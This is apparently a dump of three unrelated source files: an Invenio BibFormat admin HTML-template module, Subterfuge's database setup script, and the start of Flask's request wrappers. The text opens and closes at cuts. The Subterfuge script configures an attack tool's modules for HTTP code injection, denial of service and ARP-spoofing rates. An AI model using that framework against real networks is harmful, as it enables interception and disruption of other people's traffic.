''' % {'filename': filename,
'name': name,
'description': description,
'ln': ln,
'style': style,
'disabled': disabled,
'last_mod_date': last_mod_date,
'status': status,
'delete': _("Delete")
}
out += row_content
#table footer, buttons and bottom of the page
out += '''
<tr>
<td align="left" colspan="3">
<form action="format_templates_manage?ln=%(ln)s">
<input type="hidden" name="checking" value="1"></input>
<input class="adminbutton" type="submit" value="%(extensive_checking)s"/>
</form>
</td>
<td align="right" colspan="3">
<form action="format_template_add?ln=%(ln)s">
<input class="adminbutton" type="submit" value="%(add_format_template)s"/>
</form>
</td>
</tr>
</table>
''' % {'ln': ln,
'add_format_template': _("Add New Format Template"),
'extensive_checking': _("Check Format Templates Extensively")}
return out
def tmpl_admin_output_formats_management(self, ln, output_formats):
"""
Returns the main management console for formats. Includes list of formats and
associated administration tools.
@param ln: language
@param output_formats: a list of output formats
@return: main management console as html
"""
_ = gettext_set_language(ln) # load the right message language
#top of the page and table header
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(manage_format_templates)s</a></small> </td>
<td>1. <small>%(manage_output_formats)s</small> </td>
<td>2. <small><a href="format_elements_doc?ln=%(ln)s">%(format_elements_documentation)s</a></small> </td>
</tr>
</table>
<p>From here you can add, edit or delete output formats available for collections. Output formats define which template to use. <br/>To edit templates go to the <a href="format_templates_manage?ln=%(ln)s">template administration page</a>.</p>
<table class="admin_wvar" width="95%%" cellspacing="0">
<tr>
<th class="adminheaderleft" > </th>
<th class="adminheaderleft" ><a href="output_formats_manage?ln=%(ln)s&sortby=code">%(code)s</a></th>
<th class="adminheaderleft" ><a href="output_formats_manage?ln=%(ln)s&sortby=name">%(name)s</a></th>
<th class="adminheaderleft" >%(description)s</th>
<th class="adminheaderleft" >%(status)s</th>
<th class="adminheaderleft" >%(last_modification_date)s</th>
<th class="adminheadercenter" >%(action)s [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#outputFormats">?</a>]</th>
</tr>
''' % {'code': _("Code"),
'name': _("Name"),
'description': _("Description"),
'status': _("Status"),
'last_modification_date': _("Last Modification Date"),
'action': _("Action"),
'ln': ln,
'manage_output_formats': _("Manage Output Formats"),
'manage_format_templates': _("Manage Format Templates"),
'format_elements_documentation': _("Format Elements Documentation"),
'menu': _("Menu"),
'siteurl': CFG_SITE_URL}
#table content: formats names, description and buttons
if len(output_formats) == 0:
out += '''<tr>
<td colspan="5" class="admintd" align="center"><em>No format</em></td>
</tr>'''
else:
line = 0
for output_format in output_formats:
format_attributes = output_format['attrs']
name = format_attributes['names']['generic']
if name == "":
name = " "
description = format_attributes['description']
if description == "":
description = " "
code = format_attributes['code']
if code == "":
code = " "
last_mod_date = output_format['last_mod_date']
status = output_format['status']
disabled = ""
if not output_format['editable']:
disabled = 'disabled="disabled"'
style = "vertical-align: middle;"
if line % 2:
style = 'vertical-align: middle; background-color: rgb(235, 247, 255);'
line += 1
row_content = '''<tr>
<td class="admintdright" style="%(style)s"> </td>
<td class="admintdleft" style="white-space: nowrap; %(style)s">
<a href="output_format_show?bfo=%(code)s">%(code)s</a>
</td>
<td class="admintdleft" style="white-space: nowrap; %(style)s">
<a href="output_format_show?bfo=%(code)s">%(name)s</a>
</td>
<td class="admintdleft"style="%(style)s" >
%(description)s
</td>
<td class="admintd" style="white-space: nowrap; %(style)s" >%(status)s</td>
<td class="admintdleft" style="white-space: nowrap;%(style)s" >%(last_mod_date)s</td>
<td class="admintd" style="white-space: nowrap; %(style)s">
<form method="POST" action="output_format_delete?ln=%(ln)s&bfo=%(code)s">
<input class="adminbutton" type="submit" value="Delete" %(disabled)s />
</form>
</td>
</tr>
''' % {'style': style,
'code': code,
'description': description,
'name': name,
'ln': ln,
'disabled': disabled,
'last_mod_date': last_mod_date,
'status': status}
out += row_content
#table footer, buttons and bottom of the page
out += '''
<tr>
<td align="right" colspan="7">
<form method="GET" action="output_format_add?ln=%(ln)s">
<input class="adminbutton" type="submit" value="%(add_output_format)s"/>
</form>
</td>
</tr>
</table>
''' % {'ln': ln,
'add_output_format': _("Add New Output Format")}
return out
def tmpl_admin_output_format_show(self, ln, code, rules, default,
format_templates, editable):
"""
Returns the content of an output format
rules is an ordered list of dict (sorted by evaluation order),
with keys 'field', 'value' and 'template'
IMPORTANT: we display the rule evaluation index starting at 1 in the
interface, but we start internally at 0
@param ln: language
@param code: the code of the output to show
@param name: the name of this output format
@param rules: the list of rules for this output format
@param default: the default format template of the output format
@param format_templates: the list of format_templates
@param editable: True if we let user edit, else False
@return: the management console for this output format
"""
_ = gettext_set_language(ln)
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="output_formats_manage?ln=%(ln)s">%(close_output_format)s</a></small> </td>
<td>1. <small>%(rules)s</small> </td>
<td>2. <small><a href="output_format_show_attributes?ln=%(ln)s&bfo=%(code)s">%(modify_output_format_attributes)s</a></small> </td>
<td>3. <small><a href="output_format_show_dependencies?ln=%(ln)s&bfo=%(code)s">%(check_dependencies)s</a></small> </td>
</tr>
</table>
        <p>Define here the rules that specify which template to use for a given record.</p>
''' % {'code': code,
'ln': ln,
'menu': _("menu"),
'close_output_format': _("Close Output Format"),
'rules': _("Rules"),
'modify_output_format_attributes': _("Modify Output Format Attributes"),
'check_dependencies': _("Check Dependencies")
}
out += '''
<form name="rules" action="output_format_show?ln=%(ln)s&bfo=%(code)s" method="post">
<table>
<tr>
<td>
''' % {'ln': ln, 'code': code}
disabled = ""
readonly = ""
if not editable:
disabled = 'disabled="disabled"'
readonly = 'readonly="readonly"'
if len(rules) == 0:
out += '''<p align="center"><em>No special rule</em></p>'''
line = 1
for rule in rules:
out += '''
<table align="center" class="admin_wvar" cellspacing="0">
<tr>
'''
out += '''
<td rowspan="2" class="adminheader" style="vertical-align: middle;">'''
if line > 1:
out += '''
<input type="image" src="%(siteurl)s/img/smallup.gif" alt="Increase priority of rule %(row)s" name="+ %(row)s" value="+ %(row)s" %(disabled)s/></div>
''' % {'siteurl': CFG_SITE_URL, 'row': line, 'disabled': disabled}
out += '''<div>%(row)s</div>''' % {'row': line}
if line < len(rules):
out += '''
<input type="image" src="%(siteurl)s/img/smalldown.gif" alt="Decrease priority of rule %(row)s" name="- %(row)s" value="- %(row)s" %(disabled)s/>
''' % {'siteurl': CFG_SITE_URL,
'row': line,
'disabled': disabled}
out += '''</td>
<td class="adminheaderleft"> </td>
'''
out += '''
<td class="adminheaderleft" style="white-space: nowrap;">
Use template <select name="r_tpl" %(disabled)s>''' % {'disabled': disabled}
for template in format_templates:
attrs = format_templates[template]['attrs']
attrs['template'] = template
if template.endswith('.xsl') and not \
attrs['name'].endswith(' (XSL)'):
attrs['name'] += ' (XSL)'
if template != rule['template']:
out += '''<option value="%(template)s">%(name)s</option>''' % attrs
else:
out += '''<option value="%(template)s" selected="selected">%(name)s</option>''' % attrs
if rule['template'] not in format_templates and rule['template'] != "":
                #case where a non-existing format template is used in the output format
                #we need to add it as an option
out += '''<option value="%s" selected="selected">%s</option>''' % (rule['template'],
rule['template'])
out += '''</select> if field
<input type="text" name="r_fld" value="%(field)s" size="10" %(readonly)s/> is equal to <input type="text" value="%(value)s" name="r_val" %(readonly)s/>
</td>
<td class="adminheaderright" style="vertical-align: middle;">
[<a href="%(siteurl)s/help/admin/bibformat-admin-guide#rulesOutputFormat">?</a>]
</td>
</tr>
''' % {'siteurl': CFG_SITE_URL,
'field': rule['field'],
'value': rule['value'],
'readonly': readonly}
out += '''
<tr>
<td colspan ="3" class="adminheaderright" style="vertical-align: middle; white-space: nowrap;">
<input type="submit" class="adminbutton" name="r_upd" value="%(remove_rule_label)s %(row)s" %(disabled)s/>
</td>
</tr>
</table>
''' % {'remove_rule_label': _("Remove Rule"),
'row': line,
'disabled': disabled}
line += 1
out += '''
<table width="100%" align="center" class="admin_wvar" cellspacing="0">
<tr>
'''
out += '''
<td width="30" class="adminheaderleft"> </td>
<td class="adminheaderleft">By default use <select id="default" name="default" %(disabled)s>''' % {'disabled': disabled}
for template in format_templates:
attrs = format_templates[template]['attrs']
attrs['template'] = template
if template.endswith('.xsl') and not \
attrs['name'].endswith(' (XSL)'):
attrs['name'] += ' (XSL)'
if template != default:
out += '''<option value="%(template)s">%(name)s</option>''' % attrs
else:
out += '''<option value="%(template)s" selected="selected">%(name)s</option>''' % attrs
if default not in format_templates and default != "":
            #case where a non-existing format template is used in the output format
            #we need to add it as an option (only if it is not an empty string)
out += '''<option value="%s" selected="selected">%s</option>''' % (default, default)
out += '''</select></td>
</tr>
</table>
<div align="right">
<input tabindex="6" class="adminbutton" type="submit" name="r_upd" value="%(add_new_rule_label)s" %(disabled)s/>
<input tabindex="7" class="adminbutton" type="submit" name="r_upd" value="%(save_changes_label)s" %(disabled)s/>
</div>
</td>
</tr>
</table>
</form>
''' % {'add_new_rule_label': _("Add New Rule"),
'save_changes_label': _("Save Changes"),
'disabled': disabled
}
return out
def tmpl_admin_output_format_show_attributes(self, ln,
name,
description,
content_type,
code,
names_trans,
editable,
visible):
"""
Returns a page to change output format name and description
names_trans is an ordered list of dicts with keys 'lang' and 'trans'
@param ln: language
@param name: the name of the format
@param description: the description of the format
@param code: the code of the format
        @param content_type: the (MIME) content type of the output format
@param names_trans: the translations in the same order as the languages from get_languages()
@param editable: True if we let user edit, else False
@param visible: True if output format should be shown in list of available output formats
@return: editor for output format attributes
"""
_ = gettext_set_language(ln) # load the right message language
out = ""
out += '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="output_formats_manage?ln=%(ln)s">%(close_output_format)s</a></small> </td>
<td>1. <small><a href="output_format_show?ln=%(ln)s&bfo=%(code)s">%(rules)s</a></small> </td>
<td>2. <small>%(modify_output_format_attributes)s</small> </td>
<td>3. <small><a href="output_format_show_dependencies?ln=%(ln)s&bfo=%(code)s">%(check_dependencies)s</a></small> </td>
</tr>
</table><br/>
''' % {'ln': ln,
'code': code,
'close_output_format': _("Close Output Format"),
'rules': _("Rules"),
'modify_output_format_attributes': _("Modify Output Format Attributes"),
'check_dependencies': _("Check Dependencies"),
'menu': _("Menu")
}
disabled = ""
readonly = ""
if not editable:
disabled = 'disabled="disabled"'
readonly = 'readonly="readonly"'
out += '''
<form action="output_format_update_attributes?ln=%(ln)s&bfo=%(code)s" method="POST">
<table class="admin_wvar" cellspacing="0">
<tr>
<th colspan="2" class="adminheaderleft">
Output Format Attributes [<a href="%(siteurl)s/help/admin/bibformat-admin-guide#attrsOutputFormat">?</a>]</th>
</tr>
<tr>
<td class="admintdright"><label for="outputFormatCode">Code</label>: </td>
<td><input tabindex="0" name="code" type="text" id="outputFormatCode" maxlength="6" size="6" value="%(code)s" %(readonly)s/></td>
</tr>
<tr>
<td class="admintdright">Visibility: </td>
<td><input tabindex="1" name="visibility" type="checkbox" id="outputFormatVisibility" %(visibility)s %(disabled)s value="1" /><small><label for="outputFormatVisibility">Show in list of available output formats (on public pages)</label></small></td>
</tr>
<td class="admintdright"><label for="outputFormatContentType">Content type</label>: </td>
<td><input tabindex="2" name="content_type" type="text" id="outputFormatContentType" size="25" value="%(content_type)s" %(readonly)s/> <small>Mime content-type. Specifies how the browser should handle this output.</small></td>
<tr>
<td class="admintdright"><label for="outputFormatName">Name</label>: </td>
<td><input tabindex="3" name="name" type="text" id="outputFormatName" size="25" value="%(name)s" %(readonly)s/></td>
</tr>
''' % {'name': name,
'ln': ln,
'code': code,
'content_type': content_type,
'readonly': readonly,
'siteurl': CFG_SITE_URL,
'visibility': visible == 1 and 'checked="checked"' or '',
'disabled': disabled}
#Add translated names
i = 3
for name_trans in names_trans:
i += 1
out += '''
<tr>
<td class="admintdright"><label for="outputFormatName%(i)s">%(lang)s Name</label>: </td>
<td><input tabindex="%(i)s" name="names_trans" type="text" id="outputFormatName%(i)s" size="25" value="%(name)s" %(readonly)s/></td>
</tr>''' % {'name': name_trans['trans'],
'lang': name_trans['lang'],
'i': i,
'readonly': readonly}
#Description and end of page
out += '''
<tr>
<td class="admintdright" valign="top"><label for="outputFormatDescription">Description</label>: </td>
<td><textarea tabindex="%(tabindexdesc)s" name="description" id="outputFormatDescription" rows="4" cols="25" %(readonly)s>%(description)s</textarea> </td>
</tr>
<tr>
<td colspan="2" align="right"><input tabindex="%(tabindexbutton)s" class="adminbutton" type="submit" value="Update Output Format Attributes" %(disabled)s/></td>
</tr>
</table>
</form>
''' % {'description': description,
'tabindexdesc': i + 1,
'tabindexbutton': i + 2,
'readonly': readonly,
'disabled': disabled}
return out
def tmpl_admin_output_format_show_dependencies(self, ln, name, code, format_templates):
"""
Shows the dependencies of the given format.
@param ln: language
@param name: the name of the output format
@param code: the code of the output format
@param format_templates: format templates that depend on this format (and also elements and tags)
@return: HTML markup
"""
_ = gettext_set_language(ln) # load the right message language
out = '''
<table class="admin_wvar">
<tr><th colspan="4" class="adminheaderleft" cellspacing="0">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="output_formats_manage?ln=%(ln)s">%(close_output_format)s</a></small> </td>
<td>1. <small><a href="output_format_show?ln=%(ln)s&bfo=%(code)s">%(rules)s</a></small> </td>
<td>2. <small><a href="output_format_show_attributes?ln=%(ln)s&bfo=%(code)s">%(modify_output_format_attributes)s</a></small> </td>
<td>3. <small>%(check_dependencies)s</small> </td>
</tr>
</table><br/>
<table width="90%%" class="admin_wvar" cellspacing="0"><tr>
<th class="adminheaderleft">Format Templates that use %(name)s</th>
<th class="adminheaderleft">Format Elements used by %(name)s</th>
<th class="adminheaderleft">Tags Called*</th>
</tr>
''' % {'name': name,
'code': code,
'ln': ln,
'close_output_format': _("Close Output Format"),
'rules': _("Rules"),
'modify_output_format_attributes': _("Modify Output Format Attributes"),
'check_dependencies': _("Check Dependencies"),
'menu': _("Menu")
}
if len(format_templates) == 0:
out += '''<tr><td colspan="3"><p align="center">
<i>This output format uses no format template.</i></p></td></tr>'''
for format_template in format_templates:
name = format_template['name']
filename = format_template['filename']
out += '''<tr><td><a href="format_template_show?bft=%(filename)s&ln=%(ln)s">%(name)s</a></td>
<td> </td><td> </td></tr>''' % {'filename': filename,
'name': name,
'ln': ln}
for format_element in format_template['elements']:
name = format_element['name']
filename = format_element['filename']
out += '''<tr><td> </td>
<td><a href="format_elements_doc?ln=%(ln)s#%(anchor)s">%(name)s</a></td>
<td> </td></tr>''' % {'anchor': name.upper(),
'name': name,
'ln': ln}
for tag in format_element['tags']:
out += '''<tr><td> </td><td> </td>
<td>%(tag)s</td></tr>''' % {'tag': tag}
out += '''
</table>
<b>*Note</b>: Some tags linked with this format template might not be shown. Check manually.
'''
return out
def tmpl_admin_format_elements_documentation(self, ln, format_elements):
"""
        Returns the main management console for format elements. Includes the list of format elements and
associated administration tools.
@param ln: language
        @param format_elements: a list of dictionaries with format element attributes
@return: main management console as html
"""
_ = gettext_set_language(ln) # load the right message language
#top of the page and table header
out = '''
<table class="admin_wvar" cellspacing="0">
<tr><th colspan="4" class="adminheaderleft">%(menu)s</th></tr>
<tr>
<td>0. <small><a href="format_templates_manage?ln=%(ln)s">%(manage_format_templates)s</a></small> </td>
<td>1. <small><a href="output_formats_manage?ln=%(ln)s">%(manage_output_formats)s</a></small> </td>
<td>2. <small>%(format_elements_documentation)s</small> </td>
</tr>
</table>
        <p>Here you can read the APIs of the format elements, the elementary building blocks of formats.</p>
''' % {'ln': ln,
'menu': _("Menu"),
'manage_output_formats': _("Manage Output Formats"),
'manage_format_templates': _("Manage Format Templates"),
'format_elements_documentation': _("Format Elements Documentation"),
}
#table content: formats names, description and actions
if len(format_elements) == 0:
out += '''
<em>No format elements found</em>
'''
else:
            #Print summary of elements (name + description)
out += '''<h2>Summary table of elements</h2>'''
out += '''<table width="90%">'''
for format_element in format_elements:
format_attributes = format_element['attrs']
out += '''
<tr>
<td>
<code><a href="#%(name)s"><BFE_%(name)s/></a></code>
</td>
<td>
%(description)s
</td>
</tr>
''' % format_attributes
out += "</table>"
#Print details of elements
out += '''<h2>Details of elements</h2>'''
for format_element in format_elements:
format_attributes = format_element['attrs']
element_name = format_attributes['name']
out += self.tmpl_admin_print_format_element_documentation(ln, element_name, format_attributes)
#table footer, buttons and bottom of the page
out += '''
<table align="center" width="95%">
</table>'''
return out
def tmpl_admin_print_format_element_documentation(self, ln, name, attributes, print_see_also=True):
"""
        Prints the formatted documentation of a single element. Used in the main documentation of elements and
        in the creation of the floater for Dreamweaver.
@param ln: language
@param name: the name of the element
@param attributes: the attributes of the element, as returned by get_format_element_attrs_from_*
@param print_see_also: if True, prints links to other sections related to element
@return: HTML markup
"""
params_names = ""
for param in attributes['params']:
params_names += "<b>"+param['name'] +'</b>="..." '
out = '''
<a name="%(name)s"></a><h3>%(name)s</h3>
<b><BFE_%(name)s</b> %(params_names)s<b>/></b><br/><br/>
<em>%(description)s.</em><br/><br/>
<b>Parameters:</b><br/>
''' % {'params_names': params_names,
'name': name,
'description': attributes['description']}
for param in attributes['params']:
out += '''
<code>%(name)s</code> - %(description)s. ''' % param
if param['default'] != "":
default = cgi.escape(str(param['default']))
if default.strip() == "":
default = " "
out += '''
Default value is «<code>%s</code>»
''' % default
out += '<br/>'
for param in attributes['builtin_params']:
out += '''
<code>%(name)s</code> - %(description)s. ''' % param
if param['default'] != "":
default = cgi.escape(str(param['default']))
if default.strip() == "":
default = " "
out += '''
Default value is «<code>%s</code>»
''' % default
out += '<br/>'
if print_see_also:
out += '''<br/>
<b>See also:</b><br/>'''
for element in attributes['seealso']:
element_name = element.split('.')[0].upper()
out += '''
<a href="#%(name)s">Element <em>%(name)s</em></a><br/>''' % {'name': element_name}
out += '''
<a href ="format_element_show_dependencies?ln=%(ln)s&bfe=%(bfe)s">Dependencies of this element</a><br/>
<a href ="validate_format?ln=%(ln)s&bfe=%(bfe)s">The correctness of this element</a><br/>
<a href ="format_element_test?ln=%(ln)s&bfe=%(bfe)s">Test this element</a><br/>
''' % {'ln': ln, 'bfe': name}
return out
def tmpl_admin_format_element_show_dependencies(self, ln, name, format_templates, tags):
"""
Shows the dependencies of the given format element
@param ln: language
@param name: the name of the element
@param format_templates: format templates that depend on this element
@param tags: the tags that are called by this format element
@return: HTML markup
"""
out = '''
<p>Go back to <a href="format_elements_doc?ln=%(ln)s#%(name)s">documentation</a></p>
''' % {'ln': ln, 'name': name.upper()}
out += ''' <table width="90%" class="admin_wvar" cellspacing="0"><tr>'''
out += '''
<th class="adminheaderleft">Format Templates that use %(name)s</th>
<th class="adminheaderleft">Tags Called*</th>
</tr>
<tr>
<td> <br/>''' % {"name": name}
#Print format elements (and tags)
if len(format_templates) == 0:
out += '''<p align="center">
<i>This format element is not used in any format template.</i></p>'''
for format_template in format_templates:
name = format_template['name']
filename = format_template['filename']
out += '''<a href="format_template_show?ln=%(ln)s&bft=%(filename)s">%(name)s</a><br/>''' % {'filename': filename,
'name': name,
'ln': ln}
#Print tags
out += "</td><td> <br/>"
if len(tags) == 0:
out += '''<p align="center">
<i>This format element uses no tag.</i></p>'''
for tag in tags:
out += '''%(tag)s<br/>''' % {'tag': tag}
out += '''
</td>
</tr>
</table>
<b>*Note</b>: Some tags linked with this format template might not be shown. Check manually.
'''
return out
def tmpl_admin_format_element_test(self, ln, bfe, description, param_names, param_values, param_descriptions, result):
"""
Prints a page where the user can test the given format element with his own parameters.
@param ln: language
@param bfe: the format element name
@param description: a description of the element
@param param_names: a list of parameters names/labels
@param param_values: a list of values for parameters
@param param_descriptions: a list of description for parameters
@param result: the result of the evaluation
@return: HTML markup
"""
out = '''
<p>Go back to <a href="format_elements_doc?ln=%(ln)s#%(name)s">documentation</a></p>
''' % {'ln': ln, 'name': bfe.upper()}
out += '''
<h3><BFE_%(bfe)s /></h3>
<p>%(description)s</p>
<table width="100%%"><tr><td>
<form method="post" action="format_element_test?ln=%(ln)s&bfe=%(bfe)s">
<table>
''' % {'bfe': bfe, 'ln': ln, 'description': description}
for i in range(len(param_names)):
out += '''
<tr>
<td class="admintdright">%(name)s</td>
<td class="admintdright"><input type="text" name="param_values" value="%(value)s"/></td>
<td class="admintdleft">%(description)s </td>
</tr>
''' % {'name': cgi.escape(param_names[i]),
'value': cgi.escape(param_values[i], quote=True),
'description': param_descriptions[i]}
out += '''
<tr><td colspan="2" class="admintdright"><input type="submit" class="adminbutton" value="Test!"/></td>
<td> </td>
</tr>
</table>
</form>
<fieldset style="display:inline;margin-left:auto;margin-right:auto;">
<legend>Result:</legend>%(result)s</fieldset>
''' % {'result': result}
out += '''
</td></tr><tr><td>
'''
#out += self.tmpl_admin_print_format_element_documentation(ln, bfe, attributes, False)
out += '''</td></tr></table>'''
return out
def tmpl_admin_add_format_element(self, ln):
"""
Shows how to add a format element (mainly doc)
@param ln: language
@return: HTML markup
"""
_ = gettext_set_language(ln) # load the right message language
out = '''
        <p>To add a new basic element (one that only fetches the value of a field, without special post-processing), go to the <a href="%(siteurl)s/admin/bibindex/bibindexadmin.py/field">BibEdit "Manage Logical Fields"</a> page and add a name for a field. Make sure that the name is unique and corresponds well to the field. For example, to add an element that fetches the value of field 245__%%, add a new logical field with name "title" and field "245__%%". Then, in your template, call BFE_TITLE to print the title.</p>
        <p>To add a new complex element (e.g. special formatting of the field, a condition on the value, etc.) you must go to the lib/python/invenio/bibformat_elements directory of your Invenio installation and add a new format element file. Read the documentation for more information.</p>
''' % {'siteurl': CFG_SITE_URL}
return out
def tmpl_dreamweaver_floater(self, ln, format_elements):
"""
Returns the content of the BibFormat palette for Dreamweaver. This
        'floater' lets Dreamweaver users insert Format elements
into their code right from the floater.
@param ln: language
@param format_elements: an ordered list of format elements structures as returned by get_format_elements
@return: HTML markup (according to Dreamweaver specs)
"""
names_list = [] # list of element names such as ['Authors', 'Title']
codes_list = [] # list of element code such as ['<BFE_AUTHORS limit="" separator="," />', '<BFE_TITLE />']
docs_list = [] # list of HTML doc for each element
for format_element in format_elements:
format_attributes = format_element['attrs']
name = format_attributes['name']
#description = format_attributes['description']
params = [x['name'] + '="'+str(x['default'])+'"' for x in format_attributes['params']]
builtin_params = [x['name'] + '="'+str(x['default'])+'"' for x in format_attributes['builtin_params']]
code = ("<BFE_" + name + ' ' + ' '.join(builtin_params)+ ' ' + ' '.join(params) +"/>").replace("'", r"\'")
doc = self.tmpl_admin_print_format_element_documentation(ln, name, format_attributes, print_see_also=False).replace("'", r"\'")
names_list.append(name)
codes_list.append(code)
docs_list.append(doc)
out = '''
<!DOCTYPE HTML SYSTEM "-//Macromedia//DWExtension layout-engine5.0//floater">
<html>
<head>
<!-- This file is to be used as floating panel for Dreamweaver.
To install, drag and drop inside /Configuration/Floaters of your Dreamweaver
application directory. You also have to enable a menu to open the floater:
Edit file Menu.xml located inside /Configuration/Menus of your Dreamweaver
application directory and copy-paste the following line in the menu you want
(typically inside tag 'menu' with attribute id = 'DWMenu_Window_Others'):
<menuitem name="BibFormat Elements" enabled="true" command="dw.toggleFloater('BibFormat_floater.html')" checked="dw.getFloaterVisibility('BibFormat_floater.html')" />
-->
<title>BibFormat Elements</title>
<script language="JavaScript">
var docs = new Array(%(docs)s);
var codes = new Array(%(codes)s);
function selectionChanged(){
// get the selected node
var theDOM = dw.getDocumentDOM();
var theNode = theDOM.getSelectedNode();
// check if node is a BibFormat Element
if (theNode.nodeType == Node.COMMENT_NODE && theNode.data.length >= 5 && theNode.data.toLowerCase().substring(0,5) == "<bfe_"){
var names = document.elementsList.options;
for (i=0;i<names.length; i++){
if (names[i].text.toLowerCase() == theNode.data.split(' ')[0].toLowerCase() ||
names[i].text.toLowerCase() == theNode.data.split(' ')[0].toLowerCase().substring(5,theNode.data.length)){
document.elementsList.selectedIndex = i;
selectElement(document.elementsList);
return;
}
}
}
}
function isAvailableInCodeView(){
return true;
}
function selectElement(elementsList){
document.infoBFE.innerHTML = docs[elementsList.selectedIndex];
}
function insertElement(){
// insert selection into code
var element_code = codes[document.elementsList.selectedIndex];
// get the DOM
var theDOM = dw.getDocumentDOM();
var theDocEl = theDOM.documentElement;
var theWholeDoc = theDocEl.outerHTML;
// Get the offsets of the selection
var theSel = theDOM.getSelection();
theDocEl.outerHTML = theWholeDoc.substring(0,theSel[0]) + element_code + theWholeDoc.substring(theSel[1]);
}
</script>
</head>
<body>
<table width="100%%" border="0" cellspacing="0" cellpadding="3">
<tr>
<td valign="top">
<select name="elementsList" id="elementsList" size="15" onChange="selectElement(this)">
%(names)s
</select><br/>
<input type="submit" name="Submit" value="Insert" onClick="insertElement()">
</td>
<td valign="top" width="100%%">
<div id="infoBFE">
<center>No Format Element selected. Select one from the list on the right.</center>
</div>
</td>
</tr>
</table>
</body>
</html>
''' % {'docs': ', '.join(["'"+x+"'" for x in docs_list]).replace('\n', '\\n'),
'codes': ', '.join(["'"+x+"'" for x in codes_list]).replace('\n', '\\n'),
'names': '\n'.join(['<option value="'+x+'">'+x+'</option>' for x in names_list])}
return out
def tmpl_admin_validate_format(self, ln, errors):
"""
Prints the errors of the validation of a format (might be any
kind of format)
@param ln: language
@param errors: a list of tuples (error code, string error message)
@return: HTML markup
"""
_ = gettext_set_language(ln) # load the right message language
out = ""
if len(errors) == 0:
out += '''<span style="color: rgb(0, 255, 0);" >%s.</span>''' % _('No problem found with format')
elif len(errors) == 1:
out += '''<span style="color: rgb(255, 0, 0);" >%s:</span><br/>''' % _('An error has been found')
else:
out += '''<span style="color: rgb(255, 0, 0);" >%s:</span><br/>''' % _('The following errors have been found')
for error in errors:
out += error + "<br/>"
return out
def tmpl_admin_dialog_box(self, url, title, message, options):
"""
Prints a dialog box with given title, message and options
@param url: the url of the page that must process the result of the dialog box
@param title: the title of the dialog box
@param message: a formatted message to display inside dialog box
@param options: a list of string options to display as button to the user
@return: HTML markup
"""
out = ""
out += '''
<div style="text-align:center;">
<fieldset style="display:inline;margin-left:auto;margin-right:auto;">
<legend>%(title)s:</legend>
<p>%(message)s</p>
<form method="post" action="%(url)s">
''' % {'title': title,
'message': message,
'url': url}
for option in options:
out += '''<input type="submit" class="adminbutton" name="chosen_option" value="%(value)s" /> ''' % {'value': option}
out += '''</form></fieldset></div>'''
return out
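# Illustrative sketch (not part of the original module): how a caller might use the
# tmpl_admin_dialog_box() method defined above. The URL, title, and option labels are
# hypothetical placeholders, and 'tmpl' is assumed to be an instance of this template class.
#
#     out = tmpl.tmpl_admin_dialog_box(
#         url='output_format_delete?ln=en&bfo=HB',   # page that processes the chosen option
#         title='Delete Output Format',
#         message='Do you really want to delete this output format?',
#         options=['Cancel', 'Delete'])              # each option becomes a submit button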
|
gpl-2.0
|
claudio-idra/subterfuge
|
dbconfigure.py
|
22
|
1470
|
#####################################################################
#This file is used to fully reset the Subterfuge Database
#It should only be necessary after significant development changes
#Usage MUST be as follows:
#rm db && rm base_db
#./manage.py syncdb
#python dbconfigure.py
#This will rebuild the Database from scratch
#####################################################################
import os
from django.conf import settings
settings.configure(DATABASE_ENGINE="sqlite3",
DATABASE_HOST="",
DATABASE_NAME="db",
DATABASE_USER="",
DATABASE_PASSWORD="")
from django.db import models
from main.models import *
from modules.models import *
#Create Settings Data Space
table = setup(autoconf = "no")
table.save()
#Build Default Settings
print "Setting Database Default Configuration..."
setup.objects.update(autoconf = "yes")
setup.objects.update(ploadrate = "3")
setup.objects.update(injectrate = "6")
setup.objects.update(arprate = "8")
setup.objects.update(smartarp = "yes")
#Build Netview Module
print "Configuring Database Space for Modules..."
print "Building HTTP Code Injection Module"
newmod = installed(name = "httpcodeinjection")
newmod.save()
print "Building Tunnel Block Module"
newmod = installed(name = "tunnelblock")
newmod.save()
print "Building Denial of Service Module"
newmod = installed(name = "dos")
newmod.save()
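# Illustrative sketch (not part of the original script): once the defaults above have been
# written, the configuration can be spot-checked from a Django shell. The single-row 'setup'
# table is an assumption based on the code above.
#
#     row = setup.objects.all()[0]
#     print row.autoconf, row.ploadrate, row.injectrate, row.arprate, row.smartarp
#     # expected: yes 3 6 8 yes
#     print [m.name for m in installed.objects.all()]
#     # expected: ['httpcodeinjection', 'tunnelblock', 'dos']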
|
gpl-3.0
|
emrecamasuvi/appengineTmp
|
lib/flask/wrappers.py
|
773
|
6709
|
# -*- coding: utf-8 -*-
"""
flask.wrappers
~~~~~~~~~~~~~~
Implements the WSGI wrappers (request and response).
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from werkzeug.wrappers import Request as RequestBase, Response as ResponseBase
from werkzeug.exceptions import BadRequest
from .debughelpers import attach_enctype_error_multidict
from . import json
from .globals import _request_ctx_stack
_missing = object()
def _get_data(req, cache):
getter = getattr(req, 'get_data', None)
if getter is not None:
return getter(cache=cache)
return req.data
class Request(RequestBase):
"""The request object used by default in Flask. Remembers the
matched endpoint and view arguments.
It is what ends up as :class:`~flask.request`. If you want to replace
the request object used you can subclass this and set
:attr:`~flask.Flask.request_class` to your subclass.
The request object is a :class:`~werkzeug.wrappers.Request` subclass and
provides all of the attributes Werkzeug defines plus a few Flask
specific ones.
"""
#: the internal URL rule that matched the request. This can be
#: useful to inspect which methods are allowed for the URL from
#: a before/after handler (``request.url_rule.methods``) etc.
#:
#: .. versionadded:: 0.6
url_rule = None
#: a dict of view arguments that matched the request. If an exception
#: happened when matching, this will be `None`.
view_args = None
#: if matching the URL failed, this is the exception that will be
#: raised / was raised as part of the request handling. This is
#: usually a :exc:`~werkzeug.exceptions.NotFound` exception or
#: something similar.
routing_exception = None
# switched by the request context until 1.0 to opt in deprecated
# module functionality
_is_old_module = False
@property
def max_content_length(self):
"""Read-only view of the `MAX_CONTENT_LENGTH` config key."""
ctx = _request_ctx_stack.top
